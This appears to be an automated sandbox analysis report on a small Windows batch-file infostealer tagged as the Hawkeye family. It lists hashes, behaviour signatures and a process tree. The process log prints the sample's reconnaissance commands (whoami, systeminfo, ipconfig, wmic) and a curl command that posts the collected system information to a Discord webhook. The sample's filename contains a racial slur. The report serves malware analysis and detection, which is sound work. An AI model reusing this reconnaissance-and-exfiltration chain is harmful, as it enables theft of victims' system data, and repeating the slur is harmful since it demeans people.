Analysis
-
max time kernel
103s -
max time network
140s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
01/04/2025, 14:46
Static task
static1
General
-
Target
5QWRY_niggagimeinfo2.bat
-
Size
699B
-
MD5
2f1b10244d657f82424382d603ef2091
-
SHA1
b7a08e5f497fbf65521ebc2a10e602c5c09ae045
-
SHA256
5bd7534e452a826f244c3f0531296895aa3d12c334bc0f9be484634af3df4f4b
-
SHA512
1a19a13f8a31d4e15feb9c436f16bf4ac3494779376995ea4377b7795a16db3832a1656473e43ed8b1c5a3f6814bc6f1d00aaf2978e7677ce7ed2f537adbb7a9
Malware Config
Signatures
-
Hawkeye family
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 30 discord.com 31 discord.com -
Collects information from the system 1 TTPs 1 IoCs
Uses WMIC.exe to find detailed system information.
pid Process 3008 WMIC.exe -
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.
pid Process 4716 ipconfig.exe 2108 ipconfig.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 2716 systeminfo.exe -
Suspicious use of AdjustPrivilegeToken 43 IoCs
description pid Process Token: SeDebugPrivilege 2344 whoami.exe Token: SeIncreaseQuotaPrivilege 3008 WMIC.exe Token: SeSecurityPrivilege 3008 WMIC.exe Token: SeTakeOwnershipPrivilege 3008 WMIC.exe Token: SeLoadDriverPrivilege 3008 WMIC.exe Token: SeSystemProfilePrivilege 3008 WMIC.exe Token: SeSystemtimePrivilege 3008 WMIC.exe Token: SeProfSingleProcessPrivilege 3008 WMIC.exe Token: SeIncBasePriorityPrivilege 3008 WMIC.exe Token: SeCreatePagefilePrivilege 3008 WMIC.exe Token: SeBackupPrivilege 3008 WMIC.exe Token: SeRestorePrivilege 3008 WMIC.exe Token: SeShutdownPrivilege 3008 WMIC.exe Token: SeDebugPrivilege 3008 WMIC.exe Token: SeSystemEnvironmentPrivilege 3008 WMIC.exe Token: SeRemoteShutdownPrivilege 3008 WMIC.exe Token: SeUndockPrivilege 3008 WMIC.exe Token: SeManageVolumePrivilege 3008 WMIC.exe Token: 33 3008 WMIC.exe Token: 34 3008 WMIC.exe Token: 35 3008 WMIC.exe Token: 36 3008 WMIC.exe Token: SeIncreaseQuotaPrivilege 3008 WMIC.exe Token: SeSecurityPrivilege 3008 WMIC.exe Token: SeTakeOwnershipPrivilege 3008 WMIC.exe Token: SeLoadDriverPrivilege 3008 WMIC.exe Token: SeSystemProfilePrivilege 3008 WMIC.exe Token: SeSystemtimePrivilege 3008 WMIC.exe Token: SeProfSingleProcessPrivilege 3008 WMIC.exe Token: SeIncBasePriorityPrivilege 3008 WMIC.exe Token: SeCreatePagefilePrivilege 3008 WMIC.exe Token: SeBackupPrivilege 3008 WMIC.exe Token: SeRestorePrivilege 3008 WMIC.exe Token: SeShutdownPrivilege 3008 WMIC.exe Token: SeDebugPrivilege 3008 WMIC.exe Token: SeSystemEnvironmentPrivilege 3008 WMIC.exe Token: SeRemoteShutdownPrivilege 3008 WMIC.exe Token: SeUndockPrivilege 3008 WMIC.exe Token: SeManageVolumePrivilege 3008 WMIC.exe Token: 33 3008 WMIC.exe Token: 34 3008 WMIC.exe Token: 35 3008 WMIC.exe Token: 36 3008 WMIC.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 3316 wrote to memory of 5032 3316 cmd.exe 87 PID 3316 wrote to memory of 5032 3316 cmd.exe 87 PID 3316 wrote to memory of 2344 3316 cmd.exe 88 PID 3316 wrote to memory of 2344 3316 cmd.exe 88 PID 3316 wrote to memory of 2716 3316 cmd.exe 89 PID 3316 wrote to memory of 2716 3316 cmd.exe 89 PID 3316 wrote to memory of 3584 3316 cmd.exe 90 PID 3316 wrote to memory of 3584 3316 cmd.exe 90 PID 3316 wrote to memory of 4716 3316 cmd.exe 97 PID 3316 wrote to memory of 4716 3316 cmd.exe 97 PID 3316 wrote to memory of 1628 3316 cmd.exe 98 PID 3316 wrote to memory of 1628 3316 cmd.exe 98 PID 3316 wrote to memory of 2108 3316 cmd.exe 99 PID 3316 wrote to memory of 2108 3316 cmd.exe 99 PID 3316 wrote to memory of 3588 3316 cmd.exe 100 PID 3316 wrote to memory of 3588 3316 cmd.exe 100 PID 3316 wrote to memory of 3008 3316 cmd.exe 101 PID 3316 wrote to memory of 3008 3316 cmd.exe 101 PID 3316 wrote to memory of 4424 3316 cmd.exe 102 PID 3316 wrote to memory of 4424 3316 cmd.exe 102
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\5QWRY_niggagimeinfo2.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3316 -
C:\Windows\system32\HOSTNAME.EXEhostname2⤵PID:5032
-
-
C:\Windows\system32\whoami.exewhoami2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2344
-
-
C:\Windows\system32\systeminfo.exesysteminfo2⤵
- Gathers system information
PID:2716
-
-
C:\Windows\system32\findstr.exefindstr /B /C:"OS Name" /C:"OS Version"2⤵PID:3584
-
-
C:\Windows\system32\ipconfig.exeipconfig2⤵
- Gathers network information
PID:4716
-
-
C:\Windows\system32\findstr.exefindstr IPv62⤵PID:1628
-
-
C:\Windows\system32\ipconfig.exeipconfig2⤵
- Gathers network information
PID:2108
-
-
C:\Windows\system32\findstr.exefindstr IPv42⤵PID:3588
-
-
C:\Windows\System32\Wbem\WMIC.exewmic logicaldisk get caption, freespace, size2⤵
- Collects information from the system
- Suspicious use of AdjustPrivilegeToken
PID:3008
-
-
C:\Windows\system32\curl.execurl -X POST https://discord.com/api/webhooks/1356639514516521070/8nlc2VGdJHuRDez5RrzlRRII70A1yJIPtcnWxxs29eiCCPnO9RISRmMRDDKhvSaTzDx8 -H -d "{\"content\": \"```\n$(type "C:\Users\Admin\AppData\Local\Temp\sysinfo.txt")\n```\"}"2⤵PID:4424
-